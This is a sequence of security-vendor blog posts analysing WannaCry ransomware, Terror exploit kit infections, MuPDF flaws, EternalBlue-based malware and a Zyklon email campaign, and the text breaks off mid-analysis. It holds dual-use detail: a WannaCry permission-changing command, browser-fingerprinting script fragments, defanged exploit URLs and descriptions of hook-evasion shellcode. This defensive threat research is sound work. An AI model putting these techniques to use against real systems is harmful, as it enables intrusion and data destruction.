    A major ransomware attack has affected many organizations across the world reportedly including Telefonica in Spain, the National Health Service in the UK, and FedEx in the US. The malware responsible for this attack is a ransomware variant known as 'WannaCry'.

    The malware then has the capability to scan heavily over TCP port 445 (Server Message Block/SMB), spreading similar to a worm, compromising hosts, encrypting files stored on them then demanding a ransom payment in the form of Bitcoin. It is important to note that this is not a threat that simply scans internal ranges to identify where to spread, it is also capable of spreading based on vulnerabilities it finds in other externally facing hosts across the internet.

    Additionally, Talos has observed WannaCry samples making use of DOUBLEPULSAR which is a persistent backdoor that is generally used to access and execute code on previously compromised systems. This allows for the installation and activation of additional software, such as malware. This backdoor is typically installed following successful exploitation of SMB vulnerabilities addressed as part of Microsoft Security Bulletin MS17-010. This backdoor is associated with an offensive exploitation framework that was released as part of the Shadow Brokers cache that was recently released to the public. Since its release it has been widely analyzed and studied by the security industry as well as on various underground hacking forums.

    WannaCry appears to primarily utilize the ETERNALBLUE modules and the DOUBLEPULSAR backdoor. The malware uses ETERNALBLUE for the initial exploitation of the SMB vulnerability. If successful it will then implant the DOUBLEPULSAR backdoor and utilize it to install the malware. If the DOUBLEPULSAR backdoor is already installed the malware will still leverage this to install the ransomware payload. This is the cause of the worm-like activity that has been widely observed across the internet

    Organizations should ensure that devices running Windows are fully patched and deployed in accordance with best practices. Additionally, organizations should have SMB ports (139, 445) blocked from all externally accessible hosts.

    Please note this threat is still under active investigation, the situation may change as we learn more or as our adversary responds to our actions. Talos will continue to actively monitor and analyze this situation for new developments and respond accordingly. As a result, new coverage may be developed or existing coverage adapted and/or modified at a later date. For current information, please refer to your Firepower Management Center or Snort.org.


    Campaign Details

    We observed an uptick in scanning of our internet facing honeypots starting shortly before 5am EST (9am UTC).




    Infrastructure Analysis

    Cisco Umbrella researchers first observed requests for one of WannaCry's killswitch domains (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com) starting at 07:24 UTC, then rising to a peak of just over 1,400 nearly 10 hours later.


    The domain composition looks almost human typed, with most characters falling into the top and home rows of a keyboard.

    Communication to this domain might be categorized as a kill switch domain due to its role in the overall execution of the malware:

    The above subroutine attempts an HTTP GET to this domain, and if it fails, continues to carry out the infection. However if it succeeds, the subroutine exits. The domain is registered to a well known sinkhole, effectively causing this sample to terminate its malicious activity.

    The raw registration information re-enforces this as it was registered on 12 May 2017:

    Malware Analysis

    An initial file "mssecsvc.exe" drops and executes "tasksche.exe", this exe tests the kill switch domains. One complete, the service mssecsvc2.0 is created, this is a method of persistance for the malware. This service executes "mssecsvc.exe" with a different entry point than the initial execution. This second execution executes 2 threads. The first thread checks the IP address of the infected machine and attempts to connect to TCP445 (SMB) of each host/IP address in the same subnet and second thread generates random IP address on the Internet to perform the same action. When the malware successfully connects to a machine, a connection is initiated and data is transferred. The malware exploits the SMB vulnerability addressed by Microsoft in the bulletin MS17-010 (ETERNALBLUE) in order to implant the DOUBLEPULSAR backdoor. The backdoor is used to execute WANNACRY on the new compromised system.

    The file tasksche.exe checks for disk drives, including network shares and removable storage devices mapped to a letter, such as 'C:/', 'D:/' etc. The malware then checks for files with a file extension as listed in the appendix and encrypts these using 2048-bit RSA encryption. While the files are being encrypted, the malware creates a new file directory 'Tor/' into which it drops tor.exe and nine dll files used by tor.exe. Additionally, it drops two further files: taskdl.exe & taskse.exe. The former deletes temporary files while the latter launches @wanadecryptor@.exe to display the ransom note on the desktop to the end user. The @wanadecryptor@.exe is not in and of itself the ransomware, only the ransom note. The encryption is performed in the background by tasksche.exe.

    The tor.exe file is executed by @wanadecryptor@.exe. This newly executed process initiates network connections to Tor nodes. This allows WannaCry to attempt to preserve anonymity by proxying their traffic through the Tor network.

    Typical of other ransomware variants, the malware also deletes any shadow copies on the victim's machine in order to make recovery more difficult. It achieve this by using WMIC.exe, vssadmin.exe and cmd.exe.

    WannaCry uses various methods to attempt to aid its execution by leveraging both attrib.exe to modify the +h flag (hide) and also icacls.exe to allow full access rights for all users, "icacls . /grant Everyone:F /T /C /Q"

    The malware has been designed as a modular service. It appears to us that the executable files associated with the ransomware have been written by a different individual than whomever developed the service module. Potentially, this means that the structure of this malware can be used to deliver and run different malicious payloads.

    After encryption is complete, the malware displays the following ransomware note. One interesting aspect of this ransomware variant is that the ransom screen is actually an executable and not an image, HTA file, or text file.
    Organisations should be aware that there is no obligation for criminals to supply decryption keys following the payment of a ransom. Talos strongly urges anyone who has been compromised to avoid paying the ransom if possible as paying the ransom directly funds development of these malicious campaigns.

    Mitigation and Prevention

    Organizations looking to mitigate the risk of becoming compromised should follow the following recommendations:

    • Ensure all Windows-based systems are fully patched. At a very minimum, ensure Microsoft bulletin MS17-010 has been applied.
    • In accordance with known best practices, any organization who has SMB publically accessible via the internet (ports 139, 445) should immediately block inbound traffic.

    Additionally, organizations should strongly consider blocking connections to TOR nodes and TOR traffic on network. Known TOR exit nodes are listed within the Security Intelligence feed of ASA Firepower devices. Enabling this to be blacklisted will prevent outbound communications to TOR networks.

    In addition to the mitigations listed above, Talos strongly encourages organizations take the following industry-standard recommended best practices to prevent attacks and campaigns like this and similar ones.

    • Ensure your organization is running an actively supported operating system that receives security updates.
    • Have effective patch management that deploys security updates to endpoints and other critical parts of your infrastructure in a timely manner.
    • Run anti-malware software on your system and ensure you regularly receive malware signature updates.
    • Implement a disaster recovery plan that includes backing up and restoring data from devices that are kept offline. Adversaries frequently target backup mechanisms to limit the possibilities a user may be able to restore their files without paying the ransom.

    Coverage

    Snort Rule: 42329-42332, 42340, 41978

    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

    Additional ways our customers can detect and block this threat are listed below.

    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella prevents DNS resolution of the domains associated with malicious activity.

    Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

    IoCs


    File names
    • d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa b.wnry
    • 055c7760512c98c8d51e4427227fe2a7ea3b34ee63178fe78631fa8aa6d15622 c.wnry
    • 402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c r.wnry
    • e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b s.wnry
    • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79 taskdl.exe
    • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d taskse.exe
    • 97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6 t.wnry
    • b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25 u.wnry

    Observed IPs 
    • 188[.]166[.]23[.]127:443 - Tor Exit Node
    • 193[.]23[.]244[.]244:443 - Tor Exit Node
    • 2[.]3[.]69[.]209:9001 - Tor Exit Node
    • 146[.]0[.]32[.]144:9001 - Tor Exit Node
    • 50[.]7[.]161[.]218:9001 - Tor Exit Node
    • 128.31.0[.]39 - Tor Exit Node
    • 213.61.66[.]116 - Tor Exit Node
    • 212.47.232[.]237 - Tor Exit Node
    • 81.30.158[.]223 - Tor Exit Node
    • 79.172.193[.]32 - Tor Exit Node
    Tor C2s
    • xxlvbrloxvriy2c5.onion
    • cwwnhwhlz52maqm7.onion
    • gx7ekbenv2riucmf.onion
    • 57g7spgrzlojinas.onion
    • 76jdd2ir2embyv47.onion


    Observed hash values
    • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
    • c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9
    • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
    • 0a73291ab5607aef7db23863cf8e72f55bcb3c273bb47f00edf011515aeb5894
    • 428f22a9afd2797ede7c0583d34a052c32693cbb55f567a60298587b6e675c6f
    • 5c1f4f69c45cff9725d9969f9ffcf79d07bd0f624e06cfa5bcbacd2211046ed6
    • 62d828ee000e44f670ba322644c2351fe31af5b88a98f2b2ce27e423dcf1d1b1
    • 72af12d8139a80f317e851a60027fdf208871ed334c12637f49d819ab4b033dd
    • 85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186
    • a1d9cd6f189beff28a0a49b10f8fe4510128471f004b3e4283ddc7f78594906b
    • a93ee7ea13238bd038bcbec635f39619db566145498fe6e0ea60e6e76d614bd3
    • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
    • eb47cd6a937221411bb8daf35900a9897fb234160087089a064066a65f42bcd4
    • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
    • 2c2d8bc91564050cf073745f1b117f4ffdd6470e87166abdfcd10ecdff040a2e
    • 7a828afd2abf153d840938090d498072b7e507c7021e4cdd8c6baf727cafc545
    • a897345b68191fd36f8cefb52e6a77acb2367432abb648b9ae0a9d708406de5b
    • fb0b6044347e972e21b6c376e37e1115dab494a2c6b9fb28b92b1e45b45d0ebc
    • 9588f2ef06b7e1c8509f32d8eddfa18041a9cc15b1c90d6da484a39f8dcdf967
    • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
    • 4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982
    • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
    Tor Artifacts

    There will be odd looking domains which are artifacts from Tor visible in network PCAPs, these domains are not considered IOCs and should not be considered malicious.



    Appendix

    List of file names encrypted by the ransomware:

    .der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .sxw, .stw, .3ds, .max, .3dm, .ods, .sxc, .stc, .dif, .slk, .wb2, .odp, .sxd, .std, .sxm, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .mdf, .ldf, .cpp, .pas, .asm, .cmd, .bat, .vbs, .sch, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .mkv, .flv, .wma, .mid, .m3u, .m4u, .svg, .psd, .tiff, .tif, .raw, .gif, .png, .bmp, .jpg, .jpeg, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .ARC, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .dwg, .pdf, .wk1, .wks, .rtf, .csv, .txt, .msg, .pst, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotm, .dot, .docm, .docx, .doc, 

    Arbitrary Code Execution Vulnerabilities in MuPDF Identified and Patched

    $
    0
    0
    Talos is disclosing the presence of two vulnerabilities in the Artifex MuPDF renderer. MuPDF is a lightweight PDF parsing and rendering library featuring high fidelity graphics, high speed, and compact code size which makes it a fairly popular PDF library for embedding in different projects, especially mobile and web applications. Both of these vulnerabilities, if exploited, could lead to arbitrary code execution of an attacker's choice on the target device. Both of these vulnerabilities have been responsibly disclosed and Artifex has released software updates to address these vulnerabilities.

    Vulnerability Details

    Two memory corruption vulnerabilities exist within Artifex MuPDF render that could result in arbitrary code execution if exploited. These two vulnerabilities manifest as a result of improperly parsing and handling parts of a PDF file.

    • TALOS-2016-0242 - MuPDF Fitz library font glyph scaling Code Execution Vulnerability
      This is a heap out-of-bounds write vulnerability that manifests in the glyph scaling code when a font glyph must be scaled down.

      Vulnerability identified by Aleksandar Nikolic.

    • TALOS-2016-0243 - MuPDf JBIG2 Parser Code Execution Vulnerability
      This is a heap-based buffer overflow vulnerability that manifests in the JBIG2 image parsing functionality for JBIG2 images that are embedded in a PDF.

      Vulnerability identified by Aleksandar Nikolic and Cory Duplantis.
    Both of these vulnerabilities could be exploited if an adversary were to specifically craft a PDF file and have a victim open that PDF file with MuPDF. Scenarios where an adversary could achieve remote code execution are email-based attack scenarios, where a user opens a malicious PDF attachment, or where a user downloads a malicious PDF from site hosting user content.

    For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:

    http://www.talosintelligence.com/vulnerability-reports/

    Coverage

    The following Snort Rules detect attempts to exploit these MuPDF vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.

    Snort Rules: 41470-41471, 41224-41225


    Beers with Talos Podcast Now Available

    $
    0
    0

    The first episodes of Beers with Talos are now available on iTunes and directly on talosintelligence.com/podcasts.



    When Talos decided to make a threat intelligence podcast, we wanted to make it different than your typical buttoned down, subdued security podcast. The BWT crew: Craig, Joel, Nigel, and Mitch, decided to do that by making a podcast that is a lot like the discussions that you would have after work with colleagues - if your colleagues were both ridiculously opinionated and hyper-focused on security research. Occasionally we’ll even have some special guests join us.

    At its core, Beers with Talos is four people from Talos unpacking some of the biggest recent security stories from various perspectives and making (terrible) jokes the whole time. It doesn’t matter if you are a grizzled SOC vet, a researcher, an executive, or you just want to stay informed about the threat landscape, everyone can take something away with them at the end of an episode. Check out the episodes we have released and let us know what you think and what topics you might want to hear covered or guest you would like us to invite for future episodes.

    You can listen and subscribe on iTunes (or directly to our RSS feed if that’s your style). We would love to hear your feedback and ideas for future episodes - tweet @TalosSecurity using #BWT or you can email us at BeersWithTalos@cisco.com.

    Terror Evolved: Exploit Kit Matures

    $
    0
    0
    This post is authored by Holger Unterbrink and Emmanuel Tacheau


    Executive Summary


    Talos is monitoring the major Exploit Kits(EK) on an ongoing basis. While investigating the changes we recently observed in the RIG EK campaigns, we identified another well known candidate: Terror Exploit Kit.

    Terror EK is one of the new players who showed up after the big Exploit Kit market consolidation last year. When Angler and friends disappeared new EKs started to try their luck. Many of them were far from Angler’s quality. One of these was Terror EK which appeared end of last year. It started with a very simple version,carpet bombing the victims with many exploits at the same time, no matter if the exploit matched the victim's browser environment or not. Unfortunately, they improved the kit step by step and we saw a fast evolution up to the latest version analysed in this report.

    We identified a potentially compromised legitimate web site acting as a malware gate, redirecting visitors initially to a RIG exploit kit landing page, then switching to Terror exploit kit one day later.

    This may indicate how these campaigns collaborate and share resources, or possibly one campaign pirating another. Terror seems to constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim's environment and then picks potentially successful exploits depending on the victim's operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.

    It is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.




    Technical Details:


    The attack chain starts with a compromised website which redirects the victim to the EK landing page by using a HTTP 302 Moved Temporarily response. The landing page is filled with some random Lorem Ipsum text as you can see in Fig. A below.

    Fig.A
    As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim's browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’. As you can see below, it is using these version information to fill them into the form. It looks like that the form names are generated dynamically, they vary in different sessions which we have recorded.

    return 
    document.getElementById("65c0cd56").value = r.flash, 
    document.getElementById("1f57be6f").value = r.pdf, 
    document.getElementById("1bc1bd0f").value = t() + "|" + r.silverlight, document.getElementById("3d64d278").value = r.quicktime, 
    document.frm.submit(), r

    At the end of the page you find this HTML form code:
    Fig.B
    For this session, we can resolve the names in the following way:

    65c0cd56 = Flash version
    1f57be6f  = PDF version
    1bc1bd0f = Silverlight version
    3d64d278 = Quicktime version

    In other sessions these names changed to e.g.
    A59117,B59117,C59117,Q59117,102b6031,80870248,55066b2d,40a632b5,7c5caca6

    The first part of the form, up to the value "od50AA42KhpGDD69…<snip>...CRDXrL45PYMCC911K" is filled in by the server. We assume they are filled in dynamically and might add further information about the victim and the campaign.

    The POST request generated by this page is answered with an HTML page including a JavaScript and a VBScript. These scripts include the URL pointing to the CVEs they are going to exploit. For a session with Win7 and Internet Explorer 8 they look like this for example:

    JavaScript:
    hxxp://146[.]185[.]166[.]209/d/9477ff41b6290c91547cc8e31ad53bee/?q=r4&r=c3c100b92ffbb7ca95d18559c72c1aff&e=cve20132551

    VBScript:
    hxxp://146[.]185[.]166[.]209/d/9477ff41b6290c91547cc8e31ad53bee/?q=r4&r=c3c100b92ffbb7ca95d18559c72c1aff&e=cve20146332

    They are exploiting these vulnerabilities and then trying to download the final malware which is going to be installed on the victim's PC. It is interesting to note that the latter VBscript based request is no longer answered after the JavaScript exploit has already successfully installed the final malware.

    The EK has clearly moved away from it’s carpet bombing approach and is now much more selective in the exploits it uses to infect the victim. If we access the site with a different browser e.g. IE11 instead of IE8 we get other files back. E.g. cve20160189 and cve20152419.

    They also use cookie based authentication for downloading the exploits. The attack chain sets the following cookie (Fig.C):

    Fig.C

    This prevents anyone from downloading the exploits directly. Someone who did not follow the full attack chain may be a competitive cyber criminal who is trying to steal the exploits or a forensic investigator who is trying to see from where and how the victim was infected.

    As mentioned above, the Javascript file exploits CVE 2013-2551. After exploitation, it generates another JScript file, writes it to disk and executes it via command line (Fig.D):

    Fig.D


    The beautified and more or less deobfuscated version of Zs3n.tmp looks like this:

    Fig.E
    This script downloads the encrypted binary stream from the EK website, decodes it, saves it to disk with a random name and finally executes it. In our case it is called rad9F6BA.tmp.exe (SHA1: e373b7f49e07d0c6176565357aedbe61e2d39306). You can find it in the process list below (Fig. F). This executable seems to be a variant of the Terdot.A/Zloader malware downloader. Beside of code sharing it also contains the same exact list of hardcoded ip addresses which are known for Zloader.

    The Terdot.A/Zloader dropper rad9F6BA.tmp.exe is using a technique known as process hollowing to inject code into the explorer.exe(3148) process. After the unpacking stage it is using dll injection to inject code into explorer.exe (1968).

    Fig.F

    Process explorer.exe (1968) then downloads and drops multiple other files, plus creating and injecting code into dwm.exe(1924) and taskhost.exe(1996) processes via CreateRemoteThread.

    Important files downloaded (see IOC section for hash):
    C:\Users\<USER>\AppData\Roaming\Romaa\php.exe
    C:\Users\<USER>\AppData\Roaming\Romaa\php5ts.dll
    C:\Users\<USER>\AppData\Roaming\Hele\fido.onm
    C:\Users\<USER>\AppData\Roaming\Xunup\quis.voz
    C:\Users\<USER>\AppData\Roaming\Romaa\miemr.php
    C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnk

    Terdot.A/Zloader makes itself persistent by downloading the PHP Interpreter environment and an obfuscated PHP script (miemr.php). To make sure the malware gets executed at startup, it adds a link to ‘C:\Users\<name>\AppData\Roaming\Romaa\php.exe miemr.php’ in the Autostart folder.

    The obfuscated miemr.php script does nothing else than generating the same binary file which was already downloaded as rad9F6BA.tmp.exe (SHA1 e373b7f49e07d0c6176565357aedbe61e2d39306) via the Exploit Kit attack chain. The script decrypts the file quis.voz which is one of the files dropped by the explorer.exe (1968) process, which also dropped the php files during the initial infection. This is a behaviour which was already described in some Sundown EK campaigns dropping Zloader. Terror EK is known for using Exploits used by Sundown, so it seems to be they also use payloads from Sundown. The PHP script in this campaign is not the same but similar to the one described in the report above (Fig.G).
    Fig.G

     See Fig.H for deobfuscated version (unarmed to decode the quis.voz file):
    Fig.H

     

    Conclusion


    We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving they quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date. Utilizing a multi-layered defensive architecture will help organizations be able to detect and protect against threats like this. Talos continues to monitor Terror EK as it evolves to ensure that we continue to effectively protect our customers. We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third-parties, and ensuring a robust offline backup solution is in place. These practices will help reduce the risk of a compromise and aid in the recovery of any such attack.


    IOC


    Summarized network communication:

    Fig.H

    Samples:

    C:\Users\<USER>\AppData\Roaming\Hele\fido.onm
    MD5: c7f52f5d46474128c51d097a07068ed5
    SHA1: 0994f518b405efce77fb743b899782bdf37fef55
    SHA256: 5a51865eee18a520035248344f7c00a4de95a500c6356687d67e09a1e4fcdbb8

    C:\Users\<USER>\AppData\Local\Temp\1wfaqsy8.exe
    MD5: fa9db03e1f07e45e48f05684da255c85
    SHA1: e373b7f49e07d0c6176565357aedbe61e2d39306
    SHA256: 9ae356843ccbda7747e45b292fcf0c3eebbcc4a93101752a0007c9abaa79037a

    C:\Users\<USER>\AppData\Roaming\Xunup\quis.voz
    MD5: 134393b69f946ae8b8cf2560579209f8
    SHA1: 96cbd5e76b91c611430f221613480b4480ccc6c4
    SHA256: d2e9530c350ac6b421cf2ab4a70cad11565cfee67c5688d88cf559f161d199f3

    C:\Users\<USER>\AppData\Roaming\Romaa\miemr.php
    MD5: e20a6d41f64fb0a78598b1ff188ad92e
    SHA1: 049b107574ca8500c05424d6974b42ce57c868ac
    SHA256: 0664e690254622bd7a00c03fce2abe119bdebbc0cc773b68772f8fed66e5d2c6

    C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnk
    MD5: 0aa9719e0b8474a88b90976a5eb3ee55
    SHA1: b6f37f41594c65cad716ed486e9bc679186fdc37
    SHA256: 3ec95a014dea4f47adc7715650ec17b7f60701422efbded181cb1cd154af5748

    Related Samples:

    f31869dd3f48f24b72ed2040eceefbcaeb4f2b93b79e75dd952aa1d3d5b022de


    Full URL:

    hxxp://beutifulcars222[.]website

    hxxp://146[.]185[.]166[.]209/e71cac9dd645d92189c49e2b30ec627a/9477ff41b6290c91547cc8e31ad53bee

    hxxp://146[.]185[.]166[.]209/9477ff41b6290c91547cc8e31ad53bee/166070/5911e2bedcb0b

    hxxp://146[.]185[.]166[.]209//d/9477ff41b6290c91547cc8e31ad53bee/?q=r4&amp;r=c3c100b92ffbb7ca95d18559c72c1aff&amp;e=cve20146332

    hxxp://146[.]185[.]166[.]209//d/9477ff41b6290c91547cc8e31ad53bee/?q=r4&amp;r=c3c100b92ffbb7ca95d18559c72c1aff&amp;e=cve20132551

    hxxp://dogpaste[.]ru/2fwCCnphQ/2g56[.]php

    hxxp://emptysand[.]ru/2fwCCnphQ/2g56[.]php


    Hardcoded IPs: 

    185.121.177.53
    185.121.177.177
    45.63.25.55
    111.67.16.202
    142.4.204.111
    142.4.205.47
    31.3.135.232
    62.113.203.55
    37.228.151.133
    144.76.133.38

    Coverage


    Snort Rule: 25050, 39754, 37909, 26638, 23179


    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

    Additional ways our customers can detect and block this threat are listed below.


    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks. Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella prevents DNS resolution of the domains associated with malicious activity. Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

    Cisco Coverage for Adylkuzz, Uiwix, and EternalRocks

    $
    0
    0
    When the WannaCry attack was launched a little over a week ago, it was one of the first large scale attacks leveraging the data that was leaked by the Shadow Brokers. At the time the real concern was how quickly we would begin to see other threats leverage the same vulnerabilities. Over the past couple of weeks, Talos has observed other malware variants that are using the ETERNALBLUE and DOUBLEPULSAR exploits from the Shadow Brokers release as part of their campaigns. Among them were Adylkuzz, Uiwix, and EternalRocks.

    Adylkuzz is a piece of malware that uses ETERNALBLUE and DOUBLEPULSAR to install cryptocurrency mining software on the infected system. This attack actually pre-dates the WannaCry attack and has continued to deliver the cryptocurrency miner.

    Uiwix uses a similar technique to install ransomware on the infected system. When the files are encrypted, the file names include "UIWIX" as part of the file extension. The key difference with this malware is that, unlike WannaCry, the Ransomware doesn't "worm itself." It only installs itself on the system.

    Another malware variant we have observed being leveraged by attackers is known as EternalRocks. In this case the malware gains access to the system using ETERNALBLUE and DOUBLEPULSAR, but then just uses that access as a backdoor to install other malicious software on the infected system. One of the notable features of this malware is the 24 hour sleep/delay that the malware does before downloading the final payload which includes multiple other exploits from the Shadow Brokers dump. This is effective in evading things like sandbox environments.

    Following the success and the media coverage of WannaCry ransomware it was inevitable that we would see attacks using similar techniques to exploit vulnerable operating systems and spread other types of malware.

    Adylkuzz, Uiwix and Eternalrocks are just first examples of copycat spreading and is likely we will see more attacks using the same infection vector in the near future. The combination of the exploit (ETERNALBLUE) and the backdoor (DOUBLEPULSAR) allows attackers to install and run arbitrary code on the affected system.

    When mitigating risks, it is important to remember that the best way to prevent attacks exploiting CVE-2017-0143 to CVE-2017-148 as described in the Microsoft Security Bulletin MS17-010 is to apply the security update as soon as it is possible for your organization.

    Coverage

    Talos has observed an increase in malware leveraging these vulnerabilities. The final payload has no bearing on the protection for these attacks. As long as they are leveraging the exploits and tools disclosed by the Shadow Brokers, network based detection will stop it.

    These attacks are exploiting vulnerabilities that have been known for at least two months and, depending on the exploit, have been covered by NGIPS and NGFW technologies dating back to mid-March 2017.

    Snort Rule: 42329-42332, 42340, 41978, 42256

    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase onSnort.org.

    Additional ways our customers can detect and block this threat are listed below.



    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Network Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella prevents DNS resolution of the domains associated with malicious activity.

    Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

    Modified Zyklon and plugins from India

    $
    0
    0

    Introduction


    Streams of malicious emails Talos inspects every day usually consist of active spamming campaigns for various ransomware families, phishing campaigns and the common malware family suspects such as banking Trojans and bots.. It is however often more interesting to analyze campaigns smaller in volume as they might contain more interesting malware. A few weeks ago I became interested in just such a campaign with a smaller number of circulating email messages. The email, first of them submitted from Middle East, purports to be coming from a Turkish trading company, which might further indicate the geographic area where the attacks were active. Analyzing malware is often like solving a puzzle, you have to do it piece by piece to reach the final image. In this case I spent more time analyzing the campaign than I initially planned. The campaign has many stages of the infection chain and all needed to be unraveled before the final payload level was reached. Furthermore, each of the stages used different development platform and was obfuscated in a different way. But let us start from the beginning.

    Stage 1 - email


    The email message contains two attachments. The first one is a Word document in the Office Open XML file format while the second is a ZIP file PurchaseOrders.zip, containing an executable file PurchaseOrders.exe. This is a relatively unusual strategy for email campaigns as it is much more common for malicious emails to contain a single attachment rather than two or more. It seems that the attackers wanted to be double sure that the recipient will open at least one of the attachments.

    Email campaign

    Stage 2a - Word Document - CVE-2013-3906


    The Word document attachment, “Letter of introduction.doc” contains an exploit for CVE-2013-3906 tiff image file parsing vulnerability. The document contains multiple TabStrip (classid: {1EFB6596-857C-11D1-B16A-00C0F0283628}) ActiveX controls also used in CVE-2012-1856.

    Embedded ActiveX controls used for heap spray

    Embedded TabStrip ActiveX controls are used for heap spraying and the embedded TIFF file named image1.jpeg triggers the CVE-2013-3906 vulnerability. There are 40 embedded ActiveX controls and each is mapped in 2MB allocated memory space. In this case, exploitation takes time but the exploit eventually crashes the vulnerable versions of Word and starts the shellcode. The shellcode is immediately visible in the hex dump of the ActiveX OLE2 file and sprayed in the memory of the exploited Word process.


    Heap sprayed shellcode from ActiveXn.bin files

    Shellcode - hook evasion


    The shellcode itself is relatively simple and, give or take, 450 bytes long, excluding the URL used for downloading the payload. As is often the case, the APIs are found by parsing the Process Environment Block (PEB) and traversing the linked list of loaded modules as well as their respective exported functions.

    Notably, before calling required APIs, the shellcode checks for presence of inline hooks, often installed by endpoint security products and jumps over the installed hook code in order to avoid being noticed in their behavior detection windows.

    Evading security hooks

    If the user was infected by the attached Word document, the shellcode would download and execute an executable from a legitimate, compromised server. The C2 server for the final payload is extracted from a configuration blob stored encrypted within the downloaded payload body.

    Stage 2b - PurchaseOrders.exe


    The executable downloaded by the shellcode is identical in its functionality to the executable attached to the email so we are eventually coming to PurchaseOrder.exe which will eventually get executed whether the user opens the attached document or if they immediately go for launching the PurchaseOrder.exe. The executable has a PDF document icon and the user can be forgiven for not recognizing it as an executable, considering the fact that Windows by default hides filename extensions of the known file types.



    Icon file used by PurchaseOrder.exe.

    The executable itself is just over 1.4MB in size, which is rather large for attachments used in email campaigns. The file itself is a self-extractable CAB archive which contains three randomly named files.

    Stage 3 - AutoIt Script


    The first file is instantly recognisable and it is a legitimate, Autoit script interpreter. The second file is a Unicode file encoded as UTF-16 and is over 110MB in size which is at first almost enough to discourage from analysis. The actual script code starts deep within the file, which provides the attacker with the ability to obfuscate the script code in a way that is not immediately visible by researchers.

    Talos has already written about a similar delivery method in the past and it seems that this campaign uses a similar generator of obfuscated Autoit scripts. Thankfully, It was relatively simple to remove all the junk characters and reduce the size of the code to analyze to a much more manageable 41KBs.


    Autoit stage deobfuscated

    The Autoit script itself creates a directory in the user's profile folder and sets its attributes to system and hidden. It then creates a copy of RegSvcs.exe .NET services installation tool or copies the existing RegSvcs.exe to a filename splwow64.exe to set up the next stage. Regscvcs.exe is used for injecting and launching a remote thread within its process space. The thread uses RC4 to decrypt the third file dropped by the original self-extractable CAB archive and reads it into the process space of regsvcs.exe. This leads us to the next stage, using an executable developed in C/C++. This stage will only exist in its executable format in memory, while it will be an RC4 encrypted data blob on the disk.

    Stage 4 - Zyklon injector


